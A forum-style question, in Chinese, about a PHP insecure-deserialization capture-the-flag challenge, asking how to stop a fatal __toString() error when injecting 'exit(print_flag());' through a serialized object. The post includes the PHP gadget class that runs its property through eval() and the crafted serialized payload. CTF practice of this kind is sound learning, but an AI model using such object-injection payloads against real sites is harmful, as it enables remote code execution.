我正在做一個關于 PHP 中不安全反序列化的 CTF 挑戰。目標是通過將代碼注入反序列化來打印標志以執行print_flag()函數。我懷疑網絡服務器只打印腳本回顯的最后一行，即使在調用exit().提供了在網絡服務器上運行的一部分 php 代碼。我已經在我自己的 php 腳本中實現了它，以找出哪些有效，哪些無效。我已經成功地序列化了一個在反序列化時執行代碼的對象。通過調用exit(print_flag());標志被打印，沒有任何進一步的錯誤......至少在我的腳本中。當我將序列化對象發送到網絡服務器時，它仍然會打印更多錯誤。此外，我嘗試從注入的代碼中返回一個字符串。那也行不通。function print_flag() {    print file_get_contents('/var/flag/flag.txt');}class Example2{    private $hook;    function __construct() {        $this->hook = "exit(print_flag());";    }    function __toString()    {        if (isset($this->hook)) eval($this->hook);    }}$flag = new Example2();$serialized = serialize($flag);print "$serialized\r\n";$deserialized = unserialize($serialized);該代碼類似于挑戰中顯示的代碼，但經過修改，因此對我有用。我希望代碼只返回標志。在我自己的機器上執行腳本時，輸出為：O:8:"Example2":1:{s:14:"Example2 hook";s:19:"exit(print_flag());";} thisistheflag當我沒有調用它時exit()：PHP 可恢復的致命錯誤：方法示例 2::__toString() 必須在第 39 行的 ../phpObjInj.php 中返回一個字符串值”網絡服務器返回：可捕獲的致命錯誤：方法示例 2::__toString() 必須在第 79 行的 /var/www/index.php 中返回一個字符串值如何停止打印錯誤？